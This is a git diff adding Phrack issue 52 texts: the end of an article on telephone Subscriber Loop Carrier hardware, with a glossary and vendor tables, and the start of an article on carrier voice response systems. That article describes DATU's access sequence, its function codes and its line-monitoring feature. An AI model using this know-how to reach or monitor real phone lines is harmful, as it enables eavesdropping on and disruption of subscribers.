+ |*   |*   |*   |*   |      | *| *|  |  | *| *|*   |*   |*   |*   |      |
+ |*   |*   |*   |*   |      |  |  |  |  |  |  |*   |*   |*   |*   |      |
+ |*   |*   |*   |*   |      | *|  |  |  |  | *|*   |*   |*   |*   |      |
+ | || | || | || | || |      | || || || || || || || | || | || | || |      |
+ | || | || | || | || |      |!||!||!||!||!||!|| || | || | || | || |      |
+ +-----------------------------------------------------------------------+
+
+
+High Density Fiber Optics Shelf (HDOS)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The HDOS interfaces between the electrical signals on the MDSs and
+optical signals on the Multi-Services Distant Terminals (MSDTs).
+
+The following diagram roughly illustrates an HDOS assembly:
+
+ +-------------------------------------------------------------------+
+ |~~|~~|~~|~~|AT&T|~~|~~|~~|~~|AT&T|~~|~~|~~|~~|AT&T|~~|~~|~~|~~|AT&T|
+ |~~|~~|~~|~~|    |~~|~~|~~|~~|    |~~|~~|~~|~~|    |~~|~~|~~|~~|    |
+ |  |  |  |  |   .|  |  |  |  |   .|  |  |  |  |   .|  |  |  |  |   .|
+ |  |  |  |  |    |  |  |  |  |    |  |  |  |  |    |  |  |  |  |    |
+ |  |  |  |  |    |  |  |  |  |    |  |  |  |  |    |  |  |  |  |    |
+ |OU|OU|OU|OU|    |OU|OU|OU|OU|    |OU|OU|OU|OU|    |OU|OU|OU|OU|    |
+ | || || || ||   || || || || ||   || || || || ||   || || || || ||   ||
+ | || || || ||PCU|| || || || ||PCU|| || || || ||PCU|| || || || ||PCU||
+ |-------------------------------------------------------------------+
+ | ~  ~  ~  ~  ~    ~  ~  ~  ~  ~    ~  ~  ~  ~  ~    ~  ~  ~  ~  ~  |
+ |-------------------------------------------------------------------+
+ |1 AMP FUSES -------> == == == == == == == ==                       |
+ +-------------------------------------------------------------------+
+
+Note: An HDOS contains 8 Optical Unit (OU) / Power Conversion Unit (PCU)
+packs, not 4 as shown in the ASCII diagram.
+
+
+
+Alarm and Test Unit (ATU)
+~~~~~~~~~~~~~~~~~~~~~~~~~
+The ATU panel reports alarms and trouble indicators using audible
+alarms, visual indicators, and telemetry. In addition, the ATU provides
+interfaces to the Pair Gain Test Controller (PGTC) and DC bypass pair
+connections.
+
+An ATU panel looks roughly like this:
+
+ +---------------------------------------------------------------------+
+ |      |      |      |      |      |      |      |      |      | *  * |
+ |      |      |      |      |      |      |      |      |      | *  * |
+ |      |      |      |      |      |      |      |      |      | *  * |
+ +---------------------------------------------------------------------+
+
+Here is a close-up of the indicator lights on the far right end of the
+ATU:
+
+                         +--------------+
+                         |   __    __   |
+             Fault --->  |   |/    |/   |  <-- Critical
+                         |              |
+                         |   __    __   |
+              Busy --->  |   |/    |/   |  <-- Major
+                         |              |
+                         |   __    __   |
+       Power Minor --->  |   |/    |/   |  <- Minor
+                         |              |
+                         +--------------+
+
+
+
+Fan Units and Heat Baffles
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Fan units are used in RTs to provide cooling, while COTs use heat
+baffles for the same purpose.
+
+The fan unit looks in an RT looks something like this:
+
+ +-----------------------------------------------------------------------+
+ |*AT&T .| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
+ | ~*  ~~| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
+ |~~ o ~~| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
+ |  o  ~~| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
+ |~ o  ~~| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
+ |      .| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
+ |~o     |  =============                                                |
+ +-----------------------------------------------------------------------+
+
+
+A close-up of the far left end of the fan unit looks like this:
+
+ +------------------------+
+ | *AT&T          o       |
+ |         +----------+   |
+ | FAULT * | CHANGE   |   |
+ |         | FAN      |   |
+ |+--------+ SPEED    |   |
+ ||LED    O  (10 MIN. |   |
+ ||TEST       TIMEOUT)|   |
+ |+-------------------+   |
+ |           10 -  - 212  |
+ |      + O   8 -  - 176  |
+ |            6 -  - 140  |
+ | TEMP       4 -  - 104  |
+ |            2 -  -  68  |
+ |      - O   0 -  -  32  |
+ |              V  F      |
+ |             C=10 * V   |
+ |  ESD            o      |
+ |  ORD  O                |
+ +------------------------+
+
+
+
+
++-----------------------------+
+| Where might you find an RT? |
++-----------------------------+
+
+
+RTs are found in quite an interesting variety of enclosures, including
+metal and cast concrete.  Some are only large enough to hold the RT,
+while others are environmentally controlled and large enough to hold the
+equipment and several working technicians.
+
+
+        . 44A + 44B Cabinets
+        . WP-91071 Cabinet
+        . 51A cabinet
+        . 80D Cabinet (Community Service Vault)
+        . 80E Cabinet (Community Service Vault)
+        . Mini hut
+        . Maxi hut
+        . Concrete hut
+        . Controlled Environment Vault (CEV)
+
+
+The 44A Cabinet is a wall mounted cabinet that requires a 44B Cabinet 
+to house the powering equipment.
+
+WP-91071 Cabinet is a stand alone cabinet.
+
+The 51A cabinet is 48" high by 29" wide by 20.5" deep.  The 51A cabinet
+consists of three sections: the front door, the electronics section,
+and the battery section.  The front door is hinged on the left and
+opens to reveal the electronics section.  The electronics section is 
+also hinged on the left, and opens to reveal the battery section.
+
+The 80D Cabinet (Community Service Vault).
+
+The 80E Cabinet (Community Service Vault).
+
+The Mini hut is a prefabricated 6' by 10' by 8' high enclosure.
+
+The Maxi hut, also known as the Electronic Equipment Enclosure (EEE) is
+a prefabricated 10' by 20' by 8' high environmentally controlled
+enclosure.
+
+The Concrete Hut is 13' 2" by 7' 7 and 8' 8.5" high.  The walls of the 
+Concrete Hut are made of precast concrete and are 4" thick.  The inside 
+of the Concrete Hut is ventilated, heated and air conditioned.  The 
+Concrete Hut is protected by intrusion alarms, smoke alarms, and high
+temperature alarms.  
+
+The Controlled Environment Vault (CEV) is a precast concrete enclosure
+designed for installation below ground.  The CEV is cast in three parts:
+the bottom half, the top half, and the entrance hatch.  The entrance to
+a CEV shows a ladder leading down into the enclosure. The CEV is the
+ultimate in environmental control.  In addition to ventilation, heating
+and optional air conditioning, the CEV also features a gas monitor that
+senses explosive and toxic gasses, a dehumidifier, and a sump pump.  The
+CEV is lit by four fluorescent lamps backed up by an emergency lamp. The
+CEV is protected by a gas alarm, a high temperature alarm, a
+high-humidity alarm, a power-loss alarm, a high-water alarm and an
+intrusion alarm.
+
+
+
+
++--------------------------------------------------------------+
+| Enclosure        | Systems | Dual Channel Banks | Lines      | 
+|------------------+---------+--------------------+------------+
+| 44A+44B Cabinets |      2  |           1        |  192       |
+| WP-91071 Cabinet |      4  |           2        |  394       |
+| 51A Cabinet      |      2  |           1        |  192       |
+| 80D Cabinet      |      4  |           2        |  384       |
+| 80E Cabinet      |      8  |           4        |  768       |
+| Concrete Hut     |  32(36) |       16(18)       | 3072(3456) |
+| CEV (16')        |  40(44) |       20(22)       | 3840(4224) |
+| CEV (24')        |  60(78) |       30(39)       | 5760(7488) |
+| EEE              |  72(78) |       36(29)       | 6912(7488) |
++--------------------------------------------------------------+
+
+Note: Number in parenthesis are applicable only to systems using bulk power.
+
+
+
+
+
++------------------------+
+| SLC Interface Software |
++------------------------+
+
+
++--------------+
+| SLC Glossary |
++--------------+
+
+
+A&M     Addition and Maintenance
+ACO     Alarm Cut Off
+ACU     Alarm Control Unit
+ACXT    Apparatus Case Crosstalk
+ADPCM   Adaptive Differential Pulse Code Modulation
+ADU     Alarm Display Unit
+AIU     Alarm Interface Unit
+ALBO    Automatic Line Build Out
+ALC     Automatic Loss Compensation
+ALIT    Automatic Line Insulation Test
+AMD     Alphanumeric Message Display
+ANI     Automatic Number Identification
+ASN     Abstract Syntax Notation
+ASU     Alarm Suppressor Unit
+ATU     Alarm and Test Unit
+AWC     Average Worst Case
+B-E     Both-Ends
+B8ZS    Bipolar with 8 Zero Substitution
+BCU     Bank Controller Unit
+BFU     Bank Fuse Unit
+BIU     Backplane Interface Unit, Bank Interface Unit
+BMP     Bandwidth Management Processor
+CAU     Craft Access Unit, Channel Access Unit
+CCITT   International Telephone and Telegraph Consultative Committee
+CCS     Hundred Call Seconds
+CDO     Community Dial Office
+CDS     Circuit Design System
+CENTREX Central Office Exchange Service
+CEV     Controlled Environment Vault
+CFU     Channel Fuse Unit
+CIMAP   Circuit Installation and Maintenance Package
+CIR     Customer Information Release
+CIT     Craft Interface Terminal
+CIU     Craft Interface Unit
+CLC     Common Language Coordinator
+CLEI    Common Language Equipment Identification
+CLF     Carrier Line Failure
+CLLI    Common Language Location Identification
+CLRC    Circuit Layout Record Card
+CMC     Construction Management Center
+CMIS    Common Management Information System
+CND     Calling Number Delivery
+CO      Central Office
+COACH   Customized On-line Aid for Customer Help
+CODEC   Coder/Decoder
+COE     Central Office Engineer
+COT     Central Office Terminal
+CP      Circuit Pack
+CPC     Circuit Provisioning Center
+CPI     Circuit Party Identification
+CRC     Cyclic Redundancy Check, Circuit Redundancy Code
+CSA     Carrier Serving Area
+CSC     Community Service Cabinet
+CSDC    Circuit Switched Digital Capability
+CSPEC   Common Systems Planning and Engineering Center
+CSS     Controlled Slip Second
+CTB     Cut Through Board
+CTU     Channel Test Unit
+CU      Channel Unit
+CUE     Channel Unit Emulator
+CV      Coding Violation
+CWG     Construction Work Group
+CZ      Carrier Zone
+DA      Distribution Area
+DACS    Digital Access Cross-connect System
+DCC     Data Communications Channel
+DCLU    Digital Carrier Line Unit
+DCU     Digital Connectivity Units
+DDF     Digital Digroup Formatter
+DDS     Digital Data Service
+DF      Distributing Frame
+DFI     Digital Facilities Interface
+DID     Direct Inward Dial
+DILEP   Digital Line Engineering Program
+DLC     Digital Loop Carrier
+DLI     Data Link Interface
+DLP     Detailed Level Procedure
+DLR     Design Layout Record
+DLS     Digital Line Schematic
+DLU     Data Link Unit
+DM      Degraded Minute
+DPO     Dial Pulse Originating
+DPT     Dial Pulse Terminating
+DPX     DATAPATH Extension
+DR      Demand Repeater
+DS0     Digital Signal 0, Data Service 0
+DS0DP   Digital Signal 0 Dataport
+DS1     Digital Signal 1 (1.544 MB/s)
+DSDC    Distribution Services Design Center
+DSL     Digital Subscriber Line
+DSNE    Directory Services Network Element
+DSPC    Distribution Services Planning Center
+DST     Digital Signal Translator
+DSU     Data Service Unit
+DSX     Digital Service Cross-connect
+DT      Distant Terminal
+DTU     Digital Test Unit
+E       Ear
+EASOP   Economic Alternative Selection for Outside Plant
+ECCR    Exchange Customer Cable Record
+EEC     Electronic Equipment Enclosure
+EEC     Equipment Engineering Center
+EFPA    Enhanced Feature Package A
+EFPB    Enhanced Feature Package B
+EFPC    Enhanced Feature Package C
+EFPD    Enhanced Feature Package D
+EFRAP   Exchange Feeder Route Analysis Program
+EJO     Engineering Job Order
+ELIU    Electrical Line Interface Unit
+EMO     Expected Measured Loss
+EOC     Embedded Operations Channel
+ES      Errored Seconds
+ESD     ElectroStatic Discharge
+ESF     Extended Super Frame
+ESPORTS Extended Super POTS
+EWC     Extreme Worst Case
+EWO     Engineering Work Order
+FA      Feeder Administration
+FAC     Facility Assignment and Control Center
+FACS    Facility Assignment and Control System
+FAP     Facility Analysis Plan
+FCS     Frame Checking Sequence
+FCU     Fan Control Unit
+FDI     Feeder Distribution Interface
+FDL     Facility Data Link
+FE      Far End
+FELP    Far End LooP
+FEMF    Foreign Potential
+FEXT    Far End Crosstalk
+FITL    Fiber In The Loop
+FL      Fault Locating
+FLTA    Fault Locate Test Adapter
+FPA     Feature Package A
+FPB     Feature Package B
+FPC     Feature Package C
+FPD     Feature Package D
+FPS     Framing Pattern Sequence
+FSM     Fiber Service Module
+FSR     Frequency Selective Ringing
+FSS     Fiber Service Shelf
+FTTH    Fiber To The Home
+FX      Foreign Exchange
+FXO     Foreign Exchange Office
+FXS     Foreign Exchange Station
+GNE     Gateway Network Element
+GS      Ground Start
+HDIC    High Density Interconnect
+HDOS    High Density Optics Shelf
+HDT     Host Digital Terminal
+HTR     Heater
+IBN     Integrated Business Network
+IDCU    Integrated Digital Carrier Unit
+IDF     Intermediate Distributing Frame
+INA     Integrated Network Access
+IOP     Input/Output Processor
+ISD     Isolation Diagram
+ISDN    Integrated Services Digital Network
+ISLU    Integrated Services Line Unit
+ITH     Integral Test Head
+LAC     Loop Assignment Center
+LAN     Link to Alarm and Networks
+LBO     Line Build Out
+LBRV    Low Bit Rate Voice
+LCRIS   Loop Cable Record Inventory System
+LDS     Local Digital Switch
+LDU     Load Distribution Unit
+LEC     Loop Electronic Coordinator
+LED     Light Emitting Diode
+LFACS   Loop Facility Assignment and Control System
+LFC     Line Feeder Converter
+LFU     Line Fuse Unit
+LIC     Lightguide Interconnect Cable
+LIT     Line Insulation Test
+LIU     Line Interface Unit
+LM      Loop Multiplexer
+LMOS    Loop Maintenance Operating System
+LOF     Loss Of Frame
+LOS     Loss Of Second
+LP      Low Power
+LRAP    Long Route Analysis Program
+LRD     Long Route Design
+LROPP   Long Range Outside Plant Plan
+LRT     Local Remote Terminal
+LS      Loop Start
+LSI     Line Side In
+LSO     Line Side Out
+LSS     Loop Switching System
+LSU     Line Switching Unit
+LT      Line Terminal
+LTC     Local Test Cabinet
+LTD     Local Test Desk
+M       Mouth
+MC      Maintenance Center
+MCC     Master Control Center
+MD      Manufacture Discontinued
+MDF     Main Distributing Frame
+MDS     Metallic Distribution Shelf
+MH      Man Hole
+MIU     Metallic Interface Unit, Maintenance Interface Unit
+MJ      Major
+MLT     Mechanized Loop Testing
+MM      Material Management
+MN      Minor
+MPP     Miscellaneous Pair Panel
+MR      Meter Reading
+MSDT    Multi-Services Distant Terminal
+MTS     Message Telephone Service
+MVEC    Majority Vote Error Correction
+MWC     Maintenance Work Center
+MWG     Maintenance Work Group
+MWI     Message Waiting Indication
+MXU     Multiplexer Unit
+NAB     Network Alarm Bus
+NAIU    Network Access Interface Unit
+NCTE    Network Channel Terminating Equipment
+NE      Near End
+NEXT    Near End Crosstalk
+NIDB    Network Interface Data Bus
+NIU     Network Interface Unit
+NM      New Manhole
+NMA     Network Monitoring and Analysis
+NPA     Numbering Plan Area
+NT      Network Termination
+NTEC    Network Terminal Equipment Center
+NTP     Non Trouble-Clearing Procedure
+OCU     Office Channel Unit
+OCUDP   Office Channel Unit Dataport
+OHCTL   Overhead Controller
+OHT     On-hook Transmission
+OIC     Optical Interconnect
+OIU     Office Interface Unit
+OLIU    Optical Line Interface Unit
+ONI     Operator Number Identification
+ONU     Optical Network Unit
+OOS     Out Of Service
+OPE     Outside Plant Engineer
+OPS     Off Premise Station
+OPS/INE Operations System/Intelligent Network Element
+ORB     Office Repeater Bay
+OSP     Outside Plant
+OSPE    Outside Plant Engineer
+OTU     Office Timing Unit
+OU      Optical Units
+OW      Order Wire
+PAM     Pulse Amplitude Modulation
+PAU     Power Amplifier Unit
+PBX     Private Branch Exchange
+PCM     Pulse Code Modulation
+PCU     Power Converter Unit
+PDC     Provisioning Display Controller
+PG      Pair Gain
+PGD     Pair Group Display
+PGP     Pair Group Planning
+PGS     Pair Gain System
+PGTC    Pair Gain Test Controller
+PIC     Polyethylene Insulated Conductor
+PICS    Plug-in Inventory Control System
+PMN     Power Minor
+PMO     Present Mode of Operation
+POTS    Plain Old Telephone Service
+PRU     Positive Ringing Unit
+PTAB    Port Test Alarm Bus
+PU      Power Unit
+PWB     Printed Wiring Board
+R&R     Remove and Reinstall
+RCU     Ring Control Unit
+RCVG    Receiving
+RDES    Remote Data Entry System
+REN     Ringer Equivalency Number
+RLS     Repeater Location Schematic
+RMU     Remote Measurement Unit, Remote Maintenance Unit
+ROS     Remote Operations Service
+RPFT    Remote Power Feed Terminal
+RSB     Repair Service Bureau
+RSM     Remote Switching Module
+RT      Remote Terminal
+RTS     Remote Test System
+RTU     Remote Test Unit
+RZ      Resistance Zone
+S&E     Service and Equipment
+S-E     Signal-End
+S/I     Signal to Interference
+S/N     Signal to Noise
+S1DN    Stage One Distributing Network
+S1DP    Stage One Distributing Panel
+SAI     Serving Area Interface
+SARTS   Switched Access Remote Testing System
+SB      Signal Battery
+SCC     Switching Control Center
+SCCS    Switching Control Center System
+SCEC    Secondary Channel Error Correction
+SDDF    Subscriber Digital Distributing Frame
+SDFI    Subscriber Digital Facility Interface
+SDH     Synchronous Digital Hierarchy
+SDX     Subscriber Digital Crossconnect
+SEFS    Severely Errored Framing Second
+SES     Severely Errored Seconds
+SF      Super Frame
+SFIU    Switching Facility Interface Unit
+SG      Signal Ground
+SID     System IDentification
+SLC     Subscriber Loop Carrier
+SLIM    Subscriber Line Interface Module
+SM      Switching Module
+SMAS    Switched Maintenance Access System
+SMU     System Memory Unit
+SO      Service Order
+SONET   Synchronous Optical Network
+SP      Standard Power, Special Protection
+SPGM    Suburban Pair Gain Planning
+SPGPM   Suburban Pair Gain Planning Method
+SPOTS   Special Plain Old Telephone Service
+SPR     Superimposed Ringing
+SPTS    Signaling Path Test Set
+SSC     Special Service Center
+SSP     Special Service Protection
+SSU     Special Service Unit
+STIU    Switching Transmission Interface Unit
+STM     Span Terminating Module
+STS     Synchronous Transport Signal
+SXS     Step-by-Step
+SYSCTL  System Controller
+T-BRITE T-Basic Rate Interface Transmission Extension
+TAD     Trouble Analysis Data
+TAP     Trouble Analysis Procedure
+TASC    Telecommunications Alarm Surveillance Control System
+TASX    Telecommunications Alarm Surveillance and Control System
+TAU     Time Assignment Unit
+TBCU    Test Bus Control Unit
+TBOS    Telemetry Byte-Oriented Serial
+TCU     TransCoder Unit
+TD      Toll Diversion
+TDM     Tandem
+TFD     Trunk Distributing Frame
+TFIU    Transmission Facility Interface Unit
+TGS     Synchronous Timing Generator
+THC     Test Head Controller
+TIRKS   Trunk Inventory and Record Keeping System
+TLWS    Trunk Line Work Station
+TMC     Time slot Management Channel
+TMT     Transmission Maintenance Terminal
+TNO     The New Order
+TNOP    Total Network Operating Plan
+TO      Transmission Only
+TOC     Task Oriented Costing
+TOP     Task Oriented Procedure
+TPI     Tip Party Identification
+TRMTG   Transmitting
+TRU     Transmit/Receive Unit
+TSI     Time Slot Interchange
+TSU     Transmission Signaling Unit
+UAS     UnAvailable Second
+UIP     User Interface Panel
+UL      Underwriters Laboratory
+UNICCAP Universal Cable Circuit Analysis Program
+USDL    U-interface Digital Subscriber Line
+VF      Voice Frequency
+VRT     Virtual Remote Terminal
+VT      Virtual Tributary
+VTU     Virtual Tributary Unit
+WATS    Wide Area Telephone Service
+WC      Wire Center
+WCPC    Wire Center Planning Center
+WES     Warranty Eligibility System
+WORD    Work Order Record Details
+XADU    eXtended Alarm Display Unit
+XTC     eXtended Test Controller
+ZCS     Zero Code Suppression
+
+
++-------------+
+| SLC Vendors |
++-------------+
+
+
+AT&T
+12450 Fair Lakes Cir
+Ste 302
+Fairfax, VA 22033
+Phone: (703) 802-3853
+Fax: (703) 802-3853
+ 
++----------------------------------------------------------+
+|                                       | SLC-5 | SLC-2000 |
++----------------------------------------------------------+
+| Maximum No. Subscriber Ports          |   192 |     768  |
+| Remote Terminal (qty. per 7-ft. size) |     3 |       1  |
+| Remote Inventory and Diagnostics      |     Y |       Y  |
+| Identical Plug-ins for RT and COT     |     Y |       Y  |
+| Max. DS1 Span Lines Supported         |    24 |      28  |
+| Max. DS1 Span Lines Powered/Protected |    24 |      28  |
+| Integrated DS-3 Interface             |     N |       N  |
+| Integrated Sonet Interface            |       |    OC-3  |
+| TR-008 Compatible Mode                |     Y |       Y  |
+| TR-303 Compatible Mode                |     Y |       Y  |
++----------------------------------------------------------+
+
+
+
+Fujitsu Network Communications Inc
+2801 Telecom Parkway
+Richardson, TX 75082
+Phone: (800) 777-3278
+Fax: (214) 479-6990
+
++------------------------------------------------------+
+|                                       | FDLC | FACTR |
++------------------------------------------------------+
+| Maximum No. Subscriber Ports          |  192 | 1920  |
+| Remote Terminal (qty. per 7-ft. size) |    4 |    5  |
+| Remote Inventory and Diagnostics      |    Y |    Y  |
+| Identical Plug-ins for RT and COT     |    Y |    Y  |
+| Max. DS1 Span Lines Supported         |    8 |   28  |
+| Max. DS1 Span Lines Powered/Protected |    0 |    0  |
+| Integrated DS-3 Interface             |    N |    N  |
+| Integrated Sonet Interface            |    N |    Y  |
+| TR-008 Compatible Mode                |    Y |    Y  |
+| TR-303 Compatible Mode                |    N |    Y  |
++------------------------------------------------------+
+
+
+
+NEC America Inc
+14040 Park Center Rd
+Herndon, VA 22071
+Phone: (703) 834-4000
+Fax: (703) 834-4306
+
++-------------------------------------------------+
+|                                       | ISC-303 |
++-------------------------------------------------+
+| Maximum No. Subscriber Ports          |     192 |
+| Remote Terminal (qty. per 7-ft. size) |      10 |
+| Remote Inventory and Diagnostics      |       Y |
+| Identical Plug-ins for RT and COT     |       Y |
+| Max. DS1 Span Lines Supported         |       5 |
+| Max. DS1 Span Lines Powered/Protected |       0 |
+| Integrated DS-3 Interface             |       N |
+| Integrated Sonet Interface            |         |
+| TR-008 Compatible Mode                |       Y |
+| TR-303 Compatible Mode                |       Y |
++-------------------------------------------------+
+ 
+
+
+Northern Telecom, Inc.
+Northern Telecom Limited
+8220 Dixie Road
+Suite 100
+Brampton, Ontario
+L6T 5P6 Canada
+Phone: (905)863-0000
+Phone: (800)4-NORTEL
+
++-------------------------------------------------------------------+
+|                                       | DMS-1 Urban | Access Node |
++-------------------------------------------------------------------+
+| Maximum No. Subscriber Ports          |         544 |         672 |
+| Remote Terminal (qty. per 7-ft. size) |           0 |           1 |
+| Remote Inventory and Diagnostics      |           Y |           Y | 
+| Identical Plug-ins for RT and COT     |           Y |           Y |
+| Max. DS1 Span Lines Supported         |           8 |          28 |
+| Max. DS1 Span Lines Powered/Protected |           8 |           0 |
+| Integrated DS-3 Interface             |           N |           Y |
+| Integrated Sonet Interface            |           N |           Y | 
+| TR-008 Compatible Mode                |           Y |           Y |
+| TR-303 Compatible Mode                |           N |           Y |
++-------------------------------------------------------------------+
+ 
+
+
+
+RELTEC Corp
+5875 Landerbrook Dr
+Cleveland, OH 44124
+Phone: (216)460-3600
+Fax: (216)460-3690
++----------------------------------------------------------------------------+
+|                                       | DISCS 1 | Sonet DISCS | DISCS FITL |
++----------------------------------------------------------------------------+
+| Maximum No. Subscriber Ports          |     672 |        2016 |          0 |
+| Remote Terminal (qty. per 7-ft. size) |     672 |         672 |        672 |
+| Remote Inventory and Diagnostics      |       Y |           Y |          Y |
+| Identical Plug-ins for RT and COT     |       Y |           Y |          Y |
+| Max. DS1 Span Lines Supported         |      28 |          84 |         84 |
+| Max. DS1 Span Lines Powered/Protected |       0 |           0 |          0 |
+| Integrated DS-3 Interface             |       N |           N |          N |
+| Integrated Sonet Interface            |       N |           Y |          Y |
+| TR-008 Compatible Mode                |       Y |           Y |          Y |
+| TR-303 Compatible Mode                |       Y |           Y |          Y |
++----------------------------------------------------------------------------+
+ 
+
+
+Siescor Technologies, Inc.  (A division of Raytheon)
+Box 470580
+Tulsa, OK 74147-0580
+Phone: (918)252-1578
+Fax: (918)252-2757
+E-Mail: seiscor@raytheon.com
++-----------------------------------------------------------------------+
+|                                       | FiberTraq | S-24DU | RLC-1920 |
++-----------------------------------------------------------------------+
+| Maximum No. Subscriber Ports          |           |        |     1920 |
+| Remote Terminal (qty. per 7-ft. size) |           |        |          |
+| Remote Inventory and Diagnostics      |           |        |          |
+| Identical Plug-ins for RT and COT     |           |        |          |
+| Max. DS1 Span Lines Supported         |           |        |          |
+| Max. DS1 Span Lines Powered/Protected |           |        |          | 
+| Integrated DS-3 Interface             |           |        |          |
+| Integrated Sonet Interface            |           |        |          |
+| TR-008 Compatible Mode                |           |        |          |
+| TR-303 Compatible Mode                |           |        |          |
++-----------------------------------------------------------------------+
+
+----[  EOF
+
diff --git a/phrack52/12.txt b/phrack52/12.txt
new file mode 100644
index 0000000..cd52e52
--- /dev/null
+++ b/phrack52/12.txt
@@ -0,0 +1,647 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 12 of 20
+
+
+-------------------------[  Voice Response Systems
+
+
+--------[  Voyager[TNO]
+
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+ I................................................................ Overview
+ II............................................................... DATU
+ III.............................................................. SOLTS
+ IV............................................................... FAST
+ V................................................................ Conclusion
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+
+
+                             +----------+
+                             +  Part I  +
+                             +          +
+                             +   --     +
+                             +          +
+                             + Overview +
+                             +----------+
+
+
+A VRS (Voice Response System) is a computer system that is called using
+a normal DTMF (Dual-Tone Multi-Frequency) telephone and interacted with
+by speaking or by pressing buttons on the telephone keypad.
+
+This article will discuss three such systems which are used by LLC Local
+Loop Carriers (LLCs) to maintain the Public Switched Telephone Network
+(PSTN). The systems are:
+
+                . DATU
+                . SOLTS
+                . FAST
+
+
+                +-------------------------------------+
+                +              Part II                +
+                +                                     +
+                +                --                   +
+                +                                     +
+                + DATU LC/RT Loop Conditioning System +
+                +-------------------------------------+
+
+
+I.    Introduction
+II.   Features
+III.  Usage
+IV.   Part Numbers
+
+
+Introduction
+~~~~~~~~~~~~
+
+The Harris Corporation's DATU Loop Conditioning System combines a full
+range of advanced features with unmatched versatility to help maximize
+field testing and conditioning capabilities. The DATU system extends the
+field technicians testing capabilities of subscriber lines through the
+non-metallic environment of a pair gain system.
+
+DATU is a printed wiring card that employs micro-processor control of
+test functions and provides voice prompting. The card is installed in
+the Metallic Facility Terminal (MFT) frame and connected through a
+No-Test trunk to a switching facility. It may be used with most types of
+Central Offices (CO) including SXS, Crossbar, ESS and DMS.
+
+The DATU system can include the Pair Gain Applique (PGA) II, located
+with the DATU system at the CO, and the Metallic Access Unit (MAU),
+which is mounted within a remote terminal.
+
+PGA units allow testing of subscriber lines being served through an
+SLC-96 pair gain system. The PGA provides an interface between the DATU
+and a Pair Gain Control Unit. The DATU will transmit tones to assist in
+determining the status of the carrier channel. When a subscriber line is
+being served by a pair-gain-system and the DATU is used to test it, a
+warble tone is heard. The warble tone is followed by either a single
+one-second tone, two one-second tones, or three one-second tones. This
+indicates either a single party channel, multi party channel or a coin
+channel. The absence of a tone indicates trouble with the channel or
+channel equipment.
+
+
+Features
+~~~~~~~~
+
+AUDIO MONITOR - The subscriber line may be monitored for up to 10
+minutes, after which time the DATU disconnects from the No-Test trunk.
+Audio Monitor may be used on either busy or idle lines. Traffic on a
+busy line will be audible but unintelligible. The Audio Monitor Mode may
+be exited before the end of the 10 minute period by selecting an
+appropriate test function.
+
+OPEN LINE - Opens subscriber line by removing battery and ground.
+
+SHORT LINE - A metallic short is placed across the tip and ring of the
+subscriber line.
+
+SHORT TO GROUND - A metallic connection between tip, ring, and ground.
+This feature is not available on a busy line.
+
+TIP TO GROUND - A metallic connection between tip and ground with the
+ring open.
+
+RING TO GROUND - A metallic connection between ring and ground with the
+tip open.
+
+HIGH LEVEL TEST TONE - A high level 577Hz metallic-tracing tone,
+interrupted four times per second, for identity purposes. The High Level
+Test Tone is not available on a busy line.
+
+HIGH LEVEL TONE ON TIP - Test tone is placed only on the tip side of the
+line, with the ring side grounded.
+
+HIGH LEVEL TONE ON RING - Test tone is placed only on the ring side of
+the line, with the tip side grounded.
+
+LOW LEVEL TEST TONE - A low level 577Hz simplex-tracing tone,
+interrupted four times per second, for identity purposes. The Low Level
+Test Tone may be applied even if the line under test is busy, and it
+will not disturb traffic on that line. Note that on some No.5 ESS
+switches, Simplex tone may not transmit.
+
+SINGLE LINE ACCESS - Allows conditioning functions on the same line used
+to access the DATU system.
+
+HOLD - Used to continue a line preparation function after disconnecting
+from the system's access line.
+
+FORCED DISCONNECT - Allows the technician to disconnect from the system
+at any time by dialing ##.
+
+ADMINISTRATIVE - Password protection for both user and administrator
+modes of access. System usage counters and timers are accessible through
+interactive voice response.
+
+
+DATU Usage
+~~~~~~~~~~
+                Dial DATU Number.
+                Dial User Security Code.
+                Dial 7 Digit Subscriber Number.
+
+                          / \
+                        /     \
+                      /         \
+                    /             \
+                  /                 \
+                /                     \
+               |                       |
+
+Normal Subscriber Line          SLC Subscriber Line
+~~~~~~~~~~~~~~~~~~~~~~          ~~~~~~~~~~~~~~~~~~~
+OK                              8 second warble
+               |                       -then-
+               |                60 IPM busy:   Pair Gain Test Controller Alarm
+               |                        -or-
+               |                120 IPM Busy:  Busy test pair
+               |                        -or-
+               |                1 second tone: One party line
+               |                        -or-
+               |                2 second tone: Two party line
+               |                        -or-
+               |                3 second tone: Pay phone
+               |                        -or-
+               |                No tone:        Bad carrier channel
+               |
+               |                       |
+                \                     /
+                  \                 /
+                    \             /
+                      \         /
+                        \     /
+                          \ /
+
+                Enter DATU function code for condition:
+
+                1  Menu
+                2  Audio Monitor
+                3  Short Tip and Ring to Ground
+                4  High Level Coiling Tone
+                5  Low Level Simplex Tone
+                7  Short Tip to Ring
+                *  Continue test after disconnect (1 = 1 minute, 0=10 minutes)
+                #  Enter new seven digit subscriber number
+
+
+Harris DATU Part Numbers
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+DATU-LC Loop Conditioning System        P/N 24820-001
+PGA IIS                                 P/N 24810-002
+DATU-RT Loop Conditioning System        P/N 24820-003
+TSA                                     P/N 24800-103
+DATU-RT (GTD-5 Version)                 P/N 24820-005
+TDC                                     P/N 24800-102
+Metallic Access Unit                    P/N 24840-002
+MFT Card File                           P/N 25460-002
+Metallic Access Unit (RSU version)      P/N 24845-005
+
+
+
+
+
+                  +----------------------------------+
+                  +            PART III              +
+                  +                                  +
+                  +             --                   +
+                  +                                  +
+                  + Small Office Loop Testing System +
+                  +                                  +
+                  +            (SOLTS)               +
+                  +----------------------------------+
+
+
